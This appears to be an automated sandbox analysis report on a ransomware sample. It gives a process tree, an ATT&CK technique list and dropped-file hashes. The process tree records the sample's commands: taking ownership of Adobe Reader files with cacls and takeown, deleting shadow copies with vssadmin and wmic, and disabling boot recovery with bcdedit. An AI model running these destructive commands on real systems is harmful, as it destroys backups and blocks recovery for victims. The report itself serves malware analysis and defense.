- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:4108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:4644
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:4088
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""
  2⤵
  PID:4240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"
    3⤵
    PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "AGMGPUOptIn.ini" -nobanner
    3⤵
    PID:4156
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "AGMGPUOptIn.ini" -nobanner
      4⤵
      PID:4708
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:3304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:4412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:4428
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:4152
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4424
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:3628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    - Modifies file permissions
    PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:4292
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:4552
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4048
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:4600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:4560
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:4344
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:4668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c WzYfqHQn.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:4612
  - - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
      WzYfqHQn.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:4660
- - C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe
    WzYfqHQn.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4532

C:\Users\Admin\AppData\Local\Temp\WzYfqHQn64.exe
WzYfqHQn.exe -accepteula "Dynamic.pdf" -nobanner
1⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1036

C:\Windows\system32\taskeng.exe
taskeng.exe {B56B1694-86DB-44D9-A8DF-F81A3DF6EF07} S-1-5-21-722410544-1258951091-1992882075-1000:MGKTNXNO\Admin:Interactive:[1]
1⤵
PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\po9u17iM.bat"
  2⤵
  PID:3480
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:4956
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4780
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4936
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4868
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:4884

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2112083874-1916623128458351778-1382333269-2165227691098078653-14244038791447704716"
1⤵
- Loads dropped DLL
PID:4620

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\#README_EMAN#.rtf

Filesize
8KB

MD5
98770fcfb3495a1dda1182f7d59b0b42

SHA1
72e127b502132f218879faf5bb999501b5701988

SHA256
86839d9bdb394101450f460d5f688aeabdf666246daf1e9f1bdb2cc77014c658

SHA512
d343eae034729bdb8cc828d49d856da60179b5d4eb52148978c52db1acf7e28ec4e06de0720e9a34e2012f02759025814f7b1ff04c2a1adddc7b906ed0504e71

Download Submit
C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat

Filesize
226B

MD5
ece738810dd540201453fccc63110432

SHA1
fc38459eba89a472d5140d76ce0d6a837acfa3d0

SHA256
39dee3764cbc220513aeff37a24b9fcf60cc0879a1e06dfb7bfd90e0b7aa3d6e

SHA512
54ee3ea261c20b58f40170b69b0d5330b003c5872919dbed52855b01e00112a7dfcd9efa53fa61d21e10fe07136045446867af6377fde9bc439963f51394f793

Download Submit
C:\Users\Admin\AppData\Local\Temp\5QxdhCJa.bat

Filesize
226B

MD5
ece738810dd540201453fccc63110432

SHA1
fc38459eba89a472d5140d76ce0d6a837acfa3d0

SHA256
39dee3764cbc220513aeff37a24b9fcf60cc0879a1e06dfb7bfd90e0b7aa3d6e

SHA512
54ee3ea261c20b58f40170b69b0d5330b003c5872919dbed52855b01e00112a7dfcd9efa53fa61d21e10fe07136045446867af6377fde9bc439963f51394f793

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe

Filesize
1.2MB

MD5
a93bd199d34d21cc9102600c6ce782cf

SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc

SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe

Filesize
1.2MB

MD5
a93bd199d34d21cc9102600c6ce782cf

SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc

SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\WzYfqHQn64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\bad_04CF5892EDA3917C.txt

Filesize
4KB

MD5
3ad477feab94036a430095e0ba565451

SHA1
612b13d2da9e05e8d585058e51e9584468042059

SHA256
9d47de4a688c0bdcf8cd7c5c8119466adc822bb8f8c2ca049b0d8388837bb1fa

SHA512
210476cb7948d9234e531cd4e014b9469208983e448d92483abc516faae2a4b42c02fe9b67465471756af6c9f641e97de5b63cbb84519a55e1f3d28dd6ef2200

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_04CF5892EDA3917C.txt

Filesize
31KB

MD5
400d7d8f2d87119e805bab36702f5677

SHA1
d9d2464a4adcc247066be6bb4a3b1a25eef005f5

SHA256
28d910cc0e24f39a8b57539104067dc046c245c0d516d7fc950a6850689fa0dc

SHA512
62c135f6dae8d563836b6eb1d1048fa2b39dc282f10e7165b0b5e1243cc564136f653dcf729ca43dfbceb9ee6b283095792e09d2c826cbda177fe55206d1b6cc

Download Submit
C:\Users\Admin\AppData\Roaming\beo7taho.vbs

Filesize
260B

MD5
5636b61fd747884957da564a84f8edf0

SHA1
b3ef3a8ca0ed21162030bcf87c8cd94cf3b0f6a7

SHA256
3030f1c9165b7d69f345d595e08cb026a85403ee6fe0168028fcc8f6a75be5db

SHA512
331b0f39e392056d597fc9791eae4ce2b96444ed1a70cbefe934272ad5f5fff9c55f1e3d2ccc0db865d6c61f7c058c9607c8fa52c01ae59f15b7b0d136b66d4d

Download Submit
C:\Users\Admin\AppData\Roaming\po9u17iM.bat

Filesize
265B

MD5
65e72212627489d581ff25c4c855c2ab

SHA1
9fb906379a6d26cd291b3152272951a7ffcd8cfa

SHA256
acb521a39f0c9be3ef471c8f412231f8e4093df576bd06757f5fa309bfa0bc4d

SHA512
920fcbe39a7c87036bb6c3c6cdb3ea579c8379579852c6b6aed6d15f7aafebc64598edf00dd444f84b747d60304e7966f12e254fc1e9c3b3613f63fe5cd8476d

Download Submit
\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe

Filesize
1.2MB

MD5
a93bd199d34d21cc9102600c6ce782cf

SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc

SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

Download Submit
\Users\Admin\AppData\Local\Temp\NWhK2Pn3.exe

Filesize
1.2MB

MD5
a93bd199d34d21cc9102600c6ce782cf

SHA1
31b50d84aa1af4f0e76a523382caba476f6e45dc

SHA256
242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

SHA512
642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2

Download Submit
\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\WzYfqHQn.exe

Filesize
181KB

